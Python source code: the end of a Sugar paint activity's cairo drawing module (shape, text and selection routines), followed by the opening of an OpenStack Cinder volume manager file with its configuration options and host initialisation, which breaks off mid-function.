height = max(coords[1], last[1]) - y
# We add size to avoid drawing dotted lines
widget.queue_draw_area(x - size, y - size,
width + size * 2, height + size * 2)
else:
widget.queue_draw()
def finish_trace(self, widget):
widget.desenha = False
shape = widget.tool['line shape']
rounded = (shape == 'circle')
self._draw_polygon(widget, False, False, self.points, False, rounded)
if not rounded and len(self.points) == 1:
# draw a square if the mouse was not moved
size = widget.tool['line size']
coords = self.points[0]
widget.drawing_ctx.save()
if widget.tool['name'] == 'eraser':
color = (1.0, 1.0, 1.0, 1.0)
else:
color = widget.tool['cairo_stroke_color']
widget.drawing_ctx.set_source_rgba(*color)
widget.drawing_ctx.move_to(coords[0] - size / 2,
coords[1] - size / 2)
widget.drawing_ctx.rectangle(coords[0] - size / 2,
coords[1] - size / 2, size, size)
widget.drawing_ctx.fill()
widget.drawing_ctx.restore()
self.points = []
self._last_point_drawn_index = 0
def _trace(self, widget, coords, last):
widget.desenha = True
size = widget.tool['line size']
shape = widget.tool['line shape']
rounded = (shape == 'circle')
self.points.append((coords[0], coords[1]))
if last:
self._draw_polygon(widget, True, False, self.points, False,
rounded)
self.clear_control_points()
if last:
x = min(coords[0], last[0])
width = max(coords[0], last[0]) - x
y = min(coords[1], last[1])
height = max(coords[1], last[1]) - y
# We add size to avoid drawing dotted lines
widget.queue_draw_area(x - size, y - size,
width + size * 2, height + size * 2)
def square(self, widget, coords, temp, fill):
"""Draw a square.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between drawing context and temp context
@param fill -- Fill object
"""
x, y, dx, dy, = self.adjust(widget, coords)
points = [(x, y), (x + dx, y), (x + dx, y + dy), (x, y + dy)]
self._draw_polygon(widget, temp, fill, points)
def _draw_polygon(self, widget, temp, fill, points, closed=True,
rounded=False):
if not points:
return
if temp:
ctx = widget.temp_ctx
else:
ctx = widget.drawing_ctx
ctx.save()
ctx.new_path()
ctx.move_to(*points[0])
for point in points:
ctx.line_to(*point)
if closed:
ctx.close_path()
if rounded:
ctx.set_line_cap(cairo.LINE_CAP_ROUND)
ctx.set_line_join(cairo.LINE_JOIN_ROUND)
else:
ctx.set_line_cap(cairo.LINE_CAP_SQUARE)
ctx.set_line_join(cairo.LINE_JOIN_MITER)
ctx.set_line_width(widget.tool['line size'])
if fill:
ctx.save()
ctx.set_source_rgba(*widget.tool['cairo_fill_color'])
ctx.fill_preserve()
ctx.set_operator(cairo.OPERATOR_SOURCE)
ctx.set_source_rgba(1.0, 1.0, 1.0, 1)
ctx.stroke_preserve()
ctx.restore()
if widget.tool['name'] == 'eraser':
ctx.set_source_rgba(1.0, 1.0, 1.0, 1.0)
else:
ctx.set_source_rgba(*widget.tool['cairo_stroke_color'])
ctx.stroke()
ctx.restore()
if fill or closed:
self._last_points_used.extend(points)
area = widget.calculate_damaged_area(self._last_points_used)
widget.queue_draw_area(*area)
else:
# if is a open line and is not filled (like when using the pencil)
# we don't need draw all the poligon, can draw only the part
# from the last queue update until now
self._last_points_used = points[self._last_point_drawn_index:]
if self._last_points_used:
area = widget.calculate_damaged_area(self._last_points_used)
self._last_point_drawn_index = len(points)
widget.queue_draw_area(*area)
def triangle(self, widget, coords, temp, fill):
"""Draw a triangle.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between drawing context and temp context
@param fill -- Fill object
"""
points = [(widget.oldx, widget.oldy),
(widget.oldx + int((coords[0] - widget.oldx) / 2),
coords[1]),
(coords[0], widget.oldy)]
self._draw_polygon(widget, temp, fill, points)
def trapezoid(self, widget, coords, temp, fill):
"""Draw a trapezoid.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between context and temp context
@param fill -- Fill object
"""
dif = int((coords[0] - widget.oldx) / 4)
points = [(widget.oldx, widget.oldy), (widget.oldx + dif, coords[1]),
(coords[0] - dif, coords[1]), (coords[0], widget.oldy)]
self._draw_polygon(widget, temp, fill, points)
def arrow(self, widget, coords, temp, fill):
"""Draw a arrow.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between context and temp context
@param fill -- Fill object
"""
x = coords[0] - widget.oldx
y = coords[1] - widget.oldy
A = math.atan2(y, x)
dA = 2 * math.pi / 2
r = math.hypot(y, x)
p = [(widget.oldx, widget.oldy)]
p.append((widget.oldx + int(r * math.cos(A)),
widget.oldy + int(r * math.sin(A))))
p.append((widget.oldx + int(0.74 * r * math.cos(A + dA / 6)),
widget.oldy + int(0.74 * r * math.sin(A + dA / 6))))
p.append((widget.oldx + int(2 * r * math.cos(A + dA / 6 + dA / 20)),
widget.oldy + int(2 * r * math.sin(A + dA / 6 + dA / 20))))
p.append((widget.oldx +
int(2 * r * math.cos(A + dA / 6 - dA / 20 + dA / 6)),
widget.oldy +
int(2 * r * math.sin(A + dA / 6 - dA / 20 + dA / 6))))
p.append((widget.oldx + int(0.74 * r * math.cos(A + dA / 6 + dA / 6)),
widget.oldy + int(0.74 * r * math.sin(A + dA / 6 + dA / 6))))
p.append((widget.oldx + int(r * math.cos(A + dA / 2)),
widget.oldy + int(r * math.sin(A + dA / 2))))
self._draw_polygon(widget, temp, fill, p)
def parallelogram(self, widget, coords, temp, fill):
"""Draw a parallelogram.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between context and temp context
@param fill -- Fill object
"""
x = int((coords[0] - widget.oldx) / 4)
points = [(widget.oldx, widget.oldy), (coords[0] - x, widget.oldy),
(coords[0], coords[1]), (widget.oldx + x, coords[1])]
self._draw_polygon(widget, temp, fill, points)
def star(self, widget, coords, n, temp, fill):
"""Draw polygon with n sides.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param n -- number of sides
@param temp -- switch between context and temp context
@param fill -- Fill object
"""
x = coords[0] - widget.oldx
y = coords[1] - widget.oldy
A = math.atan2(y, x)
dA = 2 * math.pi / n
r = math.hypot(y, x)
p = [(widget.oldx + int(r * math.cos(A)),
widget.oldy + int(r * math.sin(A))),
(widget.oldx + int(0.4 * r * math.cos(A + dA / 2)),
widget.oldy + int(0.4 * r * math.sin(A + dA / 2)))]
for _i in range(int(n) - 1):
A = A + dA
p.append((widget.oldx + int(r * math.cos(A)),
widget.oldy + int(r * math.sin(A))))
p.append((widget.oldx + int(0.4 * r * math.cos(A + dA / 2)),
widget.oldy + int(0.4 * r * math.sin(A + dA / 2))))
self._draw_polygon(widget, temp, fill, p)
def polygon_regular(self, widget, coords, n, temp, fill):
"""Draw polygon with n sides.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param n -- number of sides
@param temp -- switch between context and temp context
@param fill -- Fill object
"""
x = coords[0] - widget.oldx
y = coords[1] - widget.oldy
A = math.atan2(y, x)
dA = 2 * math.pi / n
r = math.hypot(y, x)
p = [(widget.oldx + int(r * math.cos(A)),
widget.oldy + int(r * math.sin(A)))]
for _i in range(int(n) - 1):
A = A + dA
p.append((widget.oldx + int(r * math.cos(A)),
widget.oldy + int(r * math.sin(A))))
self._draw_polygon(widget, temp, fill, p)
def heart(self, widget, coords, temp, fill):
"""Draw polygon with n sides.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between context and temp context
@param fill -- Fill object
"""
if temp:
ctx = widget.temp_ctx
else:
ctx = widget.drawing_ctx
dy = math.fabs(coords[1] - widget.oldy)
r = math.hypot(dy, dy)
w = r / 10.0
if w == 0:
# non invertible cairo matrix
return
ctx.set_line_width(widget.tool['line size'])
line_width = ctx.get_line_width()
ctx.save()
ctx.new_path()
ctx.translate(widget.oldx, widget.oldy)
ctx.scale(w, w)
ctx.move_to(0, 0)
ctx.curve_to(0, -30, -50, -30, -50, 0)
ctx.curve_to(-50, 30, 0, 35, 0, 60)
ctx.curve_to(0, 35, 50, 30, 50, 0)
ctx.curve_to(50, -30, 0, -30, 0, 0)
ctx.set_line_width(line_width / w)
if fill:
ctx.save()
ctx.set_source_rgba(*widget.tool['cairo_fill_color'])
ctx.fill_preserve()
ctx.set_operator(cairo.OPERATOR_SOURCE)
ctx.set_source_rgba(1.0, 1.0, 1.0, 1)
ctx.stroke_preserve()
ctx.restore()
ctx.set_source_rgba(*widget.tool['cairo_stroke_color'])
ctx.stroke()
ctx.restore()
# TODO: clip
widget.queue_draw()
def circle(self, widget, coords, temp, fill):
"""Draw a circle.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between context and temp context
@param fill -- Fill object
"""
if temp:
ctx = widget.temp_ctx
else:
ctx = widget.drawing_ctx
x, y, dx, dy = self.adjust(widget, coords)
if dx == 0 or dy == 0:
# scale by 0 gives error
return
ctx.set_line_width(widget.tool['line size'])
line_width = ctx.get_line_width()
ctx.save()
ctx.new_path()
ctx.translate(x, y)
ctx.scale(dx, dy)
ctx.arc(0., 0., 1., 0., 2 * math.pi)
ctx.set_line_width(line_width / float(min(dx, dy)))
if fill:
ctx.save()
ctx.set_source_rgba(*widget.tool['cairo_fill_color'])
ctx.fill_preserve()
ctx.set_operator(cairo.OPERATOR_SOURCE)
ctx.set_source_rgba(1.0, 1.0, 1.0, 1)
ctx.stroke_preserve()
ctx.restore()
ctx.set_source_rgba(*widget.tool['cairo_stroke_color'])
ctx.stroke()
ctx.restore()
# TODO: clip
widget.queue_draw()
def clear(self, widget):
"""Clear the drawing.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
"""
logging.debug('Desenho.clear')
widget.desenha = False
widget.textos = []
x, y = 0, 0
width, height = widget.get_size()
# try to clear a selected area first
if widget.is_selected():
selection_surface = widget.get_selection()
_x, _y, width, height = widget.get_selection_bounds()
ctx = cairo.Context(selection_surface)
ctx.rectangle(0, 0, width, height)
ctx.set_source_rgb(1.0, 1.0, 1.0)
ctx.fill()
else:
widget.drawing_ctx.rectangle(x, y, width, height)
widget.drawing_ctx.set_source_rgb(1.0, 1.0, 1.0)
widget.drawing_ctx.fill()
widget.queue_draw()
def text(self, widget, coord_x, coord_y):
"""Display and draw text in the drawing area.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coord_x
@param coord_y
"""
if not widget.text_in_progress:
widget.text_in_progress = True
widget.activity.move_textview(coord_x, coord_y)
widget.activity.textview.show()
widget.activity.textview.set_cursor_visible(True)
widget.activity.textview.grab_focus()
else:
widget.text_in_progress = False
textview = widget.activity.textview
textview.set_cursor_visible(False)
# need wait until the cursor is hidden
GObject.idle_add(self._finalize_text, widget, textview)
def _finalize_text(self, widget, textview):
buf = textview.get_buffer()
window = textview.get_window(Gtk.TextWindowType.TEXT)
ctx = widget.drawing_ctx
tv_alloc = textview.get_allocation()
Gdk.cairo_set_source_window(ctx, window, tv_alloc.x, tv_alloc.y)
ctx.paint()
widget.activity.textview.hide()
widget.drawing_canvas.flush()
try:
widget.activity.textview.set_text('')
except AttributeError:
buf.set_text('')
widget.enable_undo()
widget.queue_draw()
def selection(self, widget, coords):
"""Make a selection.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
"""
x, y, dx, dy = self.adjust(widget, coords, True)
widget.set_selection_bounds(x, y, dx, dy)
# TODO: clip
widget.queue_draw()
def move_selection(self, widget, coords):
"""Move the selection.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param mvcopy -- Copy or Move
@param pixbuf_copy -- For import image
"""
widget.desenha = True
dx = int(coords[0] - widget.oldx)
dy = int(coords[1] - widget.oldy)
x, y, width, height = widget.get_selection_bounds()
if widget.pending_clean_selection_background:
# clear the selection background
widget.clear_selection_background()
widget.pending_clean_selection_background = False
widget.oldx = coords[0]
widget.oldy = coords[1]
new_x, new_y = x + dx, y + dy
widget.set_selection_start(new_x, new_y)
widget.queue_draw()
def resize_selection(self, widget, coords):
"""Move the selection.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param mvcopy -- Copy or Move
@param pixbuf_copy -- For import image
"""
dx = int(coords[0] - widget.oldx)
dy = int(coords[1] - widget.oldy)
sel_width = widget.selection_surface.get_width()
sel_height = widget.selection_surface.get_height()
if widget.pending_clean_selection_background:
# clear the selection background
widget.clear_selection_background()
widget.pending_clean_selection_background = False
width_scale = float(sel_width + dx) / float(sel_width)
height_scale = float(sel_height + dy) / float(sel_height)
if width_scale < 0 or height_scale < 0:
return
widget.resize_selection_surface(width_scale, height_scale)
def freeform(self, widget, coords, temp, fill, param=None):
"""Draw polygon.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param temp -- switch between drawing context and temp context
@param fill -- Fill object
"""
if param == "moving":
# mouse not pressed moving
if self.points:
if widget.last:
self.points.append((coords[0], coords[1]))
widget.last = []
else:
self.points[-1] = (coords[0], coords[1])
elif param == "motion":
# when mousepress or mousemove
if widget.last:
self.points.append((widget.last[0], widget.last[1]))
self.points.append((coords[0], coords[1]))
else:
self.points.append((widget.oldx, widget.oldy))
self.points.append((coords[0], coords[1]))
widget.last = coords
elif param == "release":
if len(self.points) > 2:
first = self.points[0]
dx = coords[0] - first[0]
dy = coords[1] - first[1]
d = math.hypot(dx, dy)
if d > 20:
widget.last = coords
self.points.append(coords)
else:
# close the polygon
self.points.append((first[0], first[1]))
# set the last point index to zero to force draw all
# the polygon
self._last_point_drawn_index = 0
self._draw_polygon(widget, False, fill, self.points)
widget.desenha = False
widget.last = []
self.points = []
widget.enable_undo()
return
widget.desenha = True
if self.points:
# Draw a circle to show where the freeform start/finish
ctx = widget.temp_ctx
ctx.save()
x_init, y_init = self.points[0]
ctx.new_path()
ctx.translate(x_init, y_init)
ctx.set_line_width(1)
ctx.set_source_rgba(1., 1., 1., 1.)
ctx.set_line_cap(cairo.LINE_CAP_ROUND)
ctx.set_line_join(cairo.LINE_JOIN_ROUND)
ctx.arc(0, 0, 20, 0., 2 * math.pi)
ctx.stroke_preserve()
ctx.set_dash([5, 5], 0)
ctx.set_source_rgba(0., 0., 0., 1.)
ctx.stroke()
ctx.restore()
# Display the polygon open in the temp canvas
self._draw_polygon(widget, True, False, self.points, closed=False)
self.clear_control_points()
def adjust(self, widget, coords, locked=False):
width, height = widget.get_size()
if widget.oldx > int(coords[0]):
xi = int(coords[0])
xf = widget.oldx
else:
xi = widget.oldx
xf = int(coords[0])
if widget.oldy > int(coords[1]):
yi = int(coords[1])
yf = widget.oldy
else:
yi = widget.oldy
yf = int(coords[1])
if locked:
if xi < 0:
xi = 0
if yi < 0:
yi = 0
if xf > width:
xf = width
if yf > height:
yf = height
dx = xf - xi
dy = yf - yi
return xi, yi, dx, dy
| samdroid-apps/paint-activity | Desenho.py | Python | gpl-2.0 | 32,007 |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2017 Georgi Georgiev
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Volume manager manages creating, attaching, detaching, and persistent storage.
Persistent storage volumes keep their state independent of instances. You can
attach to an instance, terminate the instance, spawn a new instance (even
one from a different image) and re-attach the volume with the same data
intact.
**Related Flags**
:volume_manager: The module name of a class derived from
:class:`manager.Manager` (default:
:class:`cinder.volume.manager.Manager`).
:volume_driver: Used by :class:`Manager`. Defaults to
:class:`cinder.volume.drivers.lvm.LVMVolumeDriver`.
:volume_group: Name of the group that will contain exported volumes (default:
`cinder-volumes`)
:num_shell_tries: Number of times to attempt to run commands (default: 3)
"""
#ge0rgi:added is_volume_trusted
import requests
import time
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from oslo_service import periodic_task
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import timeutils
from oslo_utils import units
from oslo_utils import uuidutils
profiler = importutils.try_import('osprofiler.profiler')
import six
from taskflow import exceptions as tfe
from cinder.common import constants
from cinder import compute
from cinder import context
from cinder import coordination
from cinder import db
from cinder import exception
from cinder import flow_utils
from cinder import keymgr as key_manager
from cinder.i18n import _, _LE, _LI, _LW
from cinder.image import cache as image_cache
from cinder.image import glance
from cinder.image import image_utils
from cinder import manager
from cinder.message import api as message_api
from cinder.message import defined_messages
from cinder.message import resource_types
from cinder import objects
from cinder.objects import cgsnapshot
from cinder.objects import consistencygroup
from cinder.objects import fields
from cinder import quota
from cinder import utils
from cinder import volume as cinder_volume
from cinder.volume import configuration as config
from cinder.volume.flows.manager import create_volume
from cinder.volume.flows.manager import manage_existing
from cinder.volume.flows.manager import manage_existing_snapshot
from cinder.volume import group_types
from cinder.volume import rpcapi as volume_rpcapi
from cinder.volume import utils as vol_utils
from cinder.volume import volume_types
from cinder.scheduler.filters.asset_tag_filter import TrustAssertionFilter
LOG = logging.getLogger(__name__)
QUOTAS = quota.QUOTAS
CGQUOTAS = quota.CGQUOTAS
GROUP_QUOTAS = quota.GROUP_QUOTAS
VALID_REMOVE_VOL_FROM_CG_STATUS = (
'available',
'in-use',
'error',
'error_deleting')
VALID_REMOVE_VOL_FROM_GROUP_STATUS = (
'available',
'in-use',
'error',
'error_deleting')
VALID_ADD_VOL_TO_CG_STATUS = (
'available',
'in-use')
VALID_ADD_VOL_TO_GROUP_STATUS = (
'available',
'in-use')
VALID_CREATE_CG_SRC_SNAP_STATUS = (fields.SnapshotStatus.AVAILABLE,)
VALID_CREATE_GROUP_SRC_SNAP_STATUS = (fields.SnapshotStatus.AVAILABLE,)
VALID_CREATE_CG_SRC_CG_STATUS = ('available',)
VALID_CREATE_GROUP_SRC_GROUP_STATUS = ('available',)
VA_LIST = objects.VolumeAttachmentList
volume_manager_opts = [
cfg.StrOpt('volume_driver',
default='cinder.volume.drivers.lvm.LVMVolumeDriver',
help='Driver to use for volume creation'),
cfg.IntOpt('migration_create_volume_timeout_secs',
default=300,
help='Timeout for creating the volume to migrate to '
'when performing volume migration (seconds)'),
cfg.BoolOpt('volume_service_inithost_offload',
default=False,
help='Offload pending volume delete during '
'volume service startup'),
cfg.StrOpt('zoning_mode',
help='FC Zoning mode configured'),
cfg.StrOpt('extra_capabilities',
default='{}',
help='User defined capabilities, a JSON formatted string '
'specifying key/value pairs. The key/value pairs can '
'be used by the CapabilitiesFilter to select between '
'backends when requests specify volume types. For '
'example, specifying a service level or the geographical '
'location of a backend, then creating a volume type to '
'allow the user to select by these different '
'properties.'),
cfg.BoolOpt('suppress_requests_ssl_warnings',
default=False,
help='Suppress requests library SSL certificate warnings.'),
]
CONF = cfg.CONF
CONF.register_opts(volume_manager_opts)
MAPPING = {
'cinder.volume.drivers.hds.nfs.HDSNFSDriver':
'cinder.volume.drivers.hitachi.hnas_nfs.HNASNFSDriver',
'cinder.volume.drivers.hds.iscsi.HDSISCSIDriver':
'cinder.volume.drivers.hitachi.hnas_iscsi.HNASISCSIDriver',
'cinder.volume.drivers.hitachi.hnas_nfs.HDSNFSDriver':
'cinder.volume.drivers.hitachi.hnas_nfs.HNASNFSDriver',
'cinder.volume.drivers.hitachi.hnas_iscsi.HDSISCSIDriver':
'cinder.volume.drivers.hitachi.hnas_iscsi.HNASISCSIDriver',
'cinder.volume.drivers.ibm.xiv_ds8k':
'cinder.volume.drivers.ibm.ibm_storage',
'cinder.volume.drivers.emc.scaleio':
'cinder.volume.drivers.dell_emc.scaleio.driver',
'cinder.volume.drivers.emc.vnx.driver.EMCVNXDriver':
'cinder.volume.drivers.dell_emc.vnx.driver.VNXDriver',
'cinder.volume.drivers.emc.xtremio.XtremIOISCSIDriver':
'cinder.volume.drivers.dell_emc.xtremio.XtremIOISCSIDriver',
'cinder.volume.drivers.emc.xtremio.XtremIOFibreChannelDriver':
'cinder.volume.drivers.dell_emc.xtremio.XtremIOFCDriver',
'cinder.volume.drivers.datera.DateraDriver':
'cinder.volume.drivers.datera.datera_iscsi.DateraDriver',
'cinder.volume.drivers.emc.emc_vmax_iscsi.EMCVMAXISCSIDriver':
'cinder.volume.drivers.dell_emc.vmax.iscsi.VMAXISCSIDriver',
'cinder.volume.drivers.emc.emc_vmax_fc.EMCVMAXFCDriver':
'cinder.volume.drivers.dell_emc.vmax.fc.VMAXFCDriver',
'cinder.volume.drivers.eqlx.DellEQLSanISCSIDriver':
'cinder.volume.drivers.dell_emc.ps.PSSeriesISCSIDriver',
}
class VolumeManager(manager.CleanableManager,
manager.SchedulerDependentManager):
"""Manages attachable block storage devices."""
RPC_API_VERSION = volume_rpcapi.VolumeAPI.RPC_API_VERSION
target = messaging.Target(version=RPC_API_VERSION)
# On cloning a volume, we shouldn't copy volume_type, consistencygroup
# and volume_attachment, because the db sets that according to [field]_id,
# which we do copy. We also skip some other values that are set during
# creation of Volume object.
_VOLUME_CLONE_SKIP_PROPERTIES = {
'id', '_name_id', 'name_id', 'name', 'status',
'attach_status', 'migration_status', 'volume_type',
'consistencygroup', 'volume_attachment', 'group'}
def __init__(self, volume_driver=None, service_name=None,
*args, **kwargs):
"""Load the driver from the one specified in args, or from flags."""
# update_service_capabilities needs service_name to be volume
super(VolumeManager, self).__init__(service_name='volume',
*args, **kwargs)
self.configuration = config.Configuration(volume_manager_opts,
config_group=service_name)
self.stats = {}
if not volume_driver:
# Get from configuration, which will get the default
# if its not using the multi backend
volume_driver = self.configuration.volume_driver
if volume_driver in MAPPING:
LOG.warning(_LW("Driver path %s is deprecated, update your "
"configuration to the new path."), volume_driver)
volume_driver = MAPPING[volume_driver]
vol_db_empty = self._set_voldb_empty_at_startup_indicator(
context.get_admin_context())
LOG.debug("Cinder Volume DB check: vol_db_empty=%s", vol_db_empty)
# We pass the current setting for service.active_backend_id to
# the driver on init, in case there was a restart or something
curr_active_backend_id = None
svc_host = vol_utils.extract_host(self.host, 'backend')
try:
service = objects.Service.get_by_args(
context.get_admin_context(),
svc_host,
constants.VOLUME_BINARY)
except exception.ServiceNotFound:
# NOTE(jdg): This is to solve problems with unit tests
LOG.info(_LI("Service not found for updating "
"active_backend_id, assuming default "
"for driver init."))
else:
curr_active_backend_id = service.active_backend_id
if self.configuration.suppress_requests_ssl_warnings:
LOG.warning(_LW("Suppressing requests library SSL Warnings"))
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecurePlatformWarning)
self.key_manager = key_manager.API(CONF)
self.driver = importutils.import_object(
volume_driver,
configuration=self.configuration,
db=self.db,
host=self.host,
cluster_name=self.cluster,
is_vol_db_empty=vol_db_empty,
active_backend_id=curr_active_backend_id)
if self.cluster and not self.driver.SUPPORTS_ACTIVE_ACTIVE:
msg = _LE('Active-Active configuration is not currently supported '
'by driver %s.') % volume_driver
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
self.message_api = message_api.API()
if CONF.profiler.enabled and profiler is not None:
self.driver = profiler.trace_cls("driver")(self.driver)
try:
self.extra_capabilities = jsonutils.loads(
self.driver.configuration.extra_capabilities)
except AttributeError:
self.extra_capabilities = {}
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Invalid JSON: %s"),
self.driver.configuration.extra_capabilities)
if self.driver.configuration.safe_get(
'image_volume_cache_enabled'):
max_cache_size = self.driver.configuration.safe_get(
'image_volume_cache_max_size_gb')
max_cache_entries = self.driver.configuration.safe_get(
'image_volume_cache_max_count')
self.image_volume_cache = image_cache.ImageVolumeCache(
self.db,
cinder_volume.API(),
max_cache_size,
max_cache_entries
)
LOG.info(_LI('Image-volume cache enabled for host %(host)s.'),
{'host': self.host})
else:
LOG.info(_LI('Image-volume cache disabled for host %(host)s.'),
{'host': self.host})
self.image_volume_cache = None
if CONF.trusted_computing:
self.asset_tag_filter = TrustAssertionFilter()
def _count_allocated_capacity(self, ctxt, volume):
pool = vol_utils.extract_host(volume['host'], 'pool')
if pool is None:
# No pool name encoded in host, so this is a legacy
# volume created before pool is introduced, ask
# driver to provide pool info if it has such
# knowledge and update the DB.
try:
pool = self.driver.get_pool(volume)
except Exception:
LOG.exception(_LE('Fetch volume pool name failed.'),
resource=volume)
return
if pool:
new_host = vol_utils.append_host(volume['host'],
pool)
self.db.volume_update(ctxt, volume['id'],
{'host': new_host})
else:
# Otherwise, put them into a special fixed pool with
# volume_backend_name being the pool name, if
# volume_backend_name is None, use default pool name.
# This is only for counting purpose, doesn't update DB.
pool = (self.driver.configuration.safe_get(
'volume_backend_name') or vol_utils.extract_host(
volume['host'], 'pool', True))
try:
pool_stat = self.stats['pools'][pool]
except KeyError:
# First volume in the pool
self.stats['pools'][pool] = dict(
allocated_capacity_gb=0)
pool_stat = self.stats['pools'][pool]
pool_sum = pool_stat['allocated_capacity_gb']
pool_sum += volume['size']
self.stats['pools'][pool]['allocated_capacity_gb'] = pool_sum
self.stats['allocated_capacity_gb'] += volume['size']
def _set_voldb_empty_at_startup_indicator(self, ctxt):
"""Determine if the Cinder volume DB is empty.
A check of the volume DB is done to determine whether it is empty or
not at this point.
:param ctxt: our working context
"""
vol_entries = self.db.volume_get_all(ctxt, None, 1, filters=None)
if len(vol_entries) == 0:
LOG.info(_LI("Determined volume DB was empty at startup."))
return True
else:
LOG.info(_LI("Determined volume DB was not empty at startup."))
return False
def _sync_provider_info(self, ctxt, volumes, snapshots):
# NOTE(jdg): For now this just updates provider_id, we can add more
# items to the update if they're relevant but we need to be safe in
# what we allow and add a list of allowed keys. Things that make sense
# are provider_*, replication_status etc
updates, snapshot_updates = self.driver.update_provider_info(
volumes, snapshots)
if updates:
for volume in volumes:
# NOTE(JDG): Make sure returned item is in this hosts volumes
update = (
[updt for updt in updates if updt['id'] ==
volume['id']])
if update:
update = update[0]
self.db.volume_update(
ctxt,
update['id'],
{'provider_id': update['provider_id']})
# NOTE(jdg): snapshots are slighty harder, because
# we do not have a host column and of course no get
# all by host, so we use a get_all and bounce our
# response off of it
if snapshot_updates:
cinder_snaps = self.db.snapshot_get_all(ctxt)
for snap in cinder_snaps:
# NOTE(jdg): For now we only update those that have no entry
if not snap.get('provider_id', None):
update = (
[updt for updt in snapshot_updates if updt['id'] ==
snap['id']][0])
if update:
self.db.snapshot_update(
ctxt,
update['id'],
{'provider_id': update['provider_id']})
def _include_resources_in_cluster(self, ctxt):
LOG.info(_LI('Including all resources from host %(host)s in cluster '
'%(cluster)s.'),
{'host': self.host, 'cluster': self.cluster})
num_vols = objects.VolumeList.include_in_cluster(
ctxt, self.cluster, host=self.host)
num_cgs = objects.ConsistencyGroupList.include_in_cluster(
ctxt, self.cluster, host=self.host)
num_cache = db.image_volume_cache_include_in_cluster(
ctxt, self.cluster, host=self.host)
LOG.info(_LI('%(num_vols)s volumes, %(num_cgs)s consistency groups, '
'and %(num_cache)s image volume caches from host '
'%(host)s have been included in cluster %(cluster)s.'),
{'num_vols': num_vols, 'num_cgs': num_cgs,
'host': self.host, 'cluster': self.cluster,
'num_cache': num_cache})
def init_host(self, added_to_cluster=None, **kwargs):
"""Perform any required initialization."""
ctxt = context.get_admin_context()
if not self.driver.supported:
utils.log_unsupported_driver_warning(self.driver)
if not self.configuration.enable_unsupported_driver:
LOG.error(_LE("Unsupported drivers are disabled."
" You can re-enable by adding "
"enable_unsupported_driver=True to the "
"driver section in cinder.conf"),
resource={'type': 'driver',
'id': self.__class__.__name__})
return
# If we have just added this host to a cluster we have to include all
# our resources in that cluster.
if added_to_cluster:
self._include_resources_in_cluster(ctxt)
LOG.info(_LI("Starting volume driver %(driver_name)s (%(version)s)"),
{'driver_name': self.driver.__class__.__name__,
'version': self.driver.get_version()})
try:
self.driver.do_setup(ctxt)
self.driver.check_for_setup_error()
except Exception:
LOG.exception(_LE("Failed to initialize driver."),
resource={'type': 'driver',
'id': self.__class__.__name__})
# we don't want to continue since we failed
# to initialize the driver correctly.
return
# Initialize backend capabilities list
self.driver.init_capabilities()
volumes = self._get_my_volumes(ctxt)
snapshots = self._get_my_snapshots(ctxt)
self._sync_provider_info(ctxt, volumes, snapshots)
# FIXME volume count for exporting is wrong
self.stats['pools'] = {}
self.stats.update({'allocated_capacity_gb': 0})
try:
for volume in volumes:
# available volume should also be counted into allocated
if volume['status'] in ['in-use', 'available']:
# calculate allocated capacity for driver
self._count_allocated_capacity(ctxt, volume)
try:
if volume['status'] in ['in-use']:
self.driver.ensure_export(ctxt, volume)
except Exception:
LOG.exception(_LE("Failed to re-export volume, "
"setting to ERROR."),
resource=volume)
volume.conditional_update({'status': 'error'},
{'status': 'in-use'})
# All other cleanups are processed by parent class CleanableManager
except Exception:
LOG.exception(_LE("Error during re-export on driver init."),
resource=volume)
return
self.driver.set_throttle()
# at this point the driver is considered initialized.
# NOTE(jdg): Careful though because that doesn't mean
# that an entry exists in the service table
self.driver.set_initialized()
# Keep the image tmp file clean when init host.
backend_name = vol_utils.extract_host(self.service_topic_queue)
image_utils.cleanup_temporary_file(backend_name)
# collect and publish service capabilities
self.publish_service_capabilities(ctxt)
LOG.info(_LI("Driver initialization completed successfully."),
resource={'type': 'driver',
'id': self.driver.__class__.__name__})
# Make sure to call CleanableManager to do the cleanup
super(VolumeManager, self).init_host(added_to_cluster=added_to_cluster,
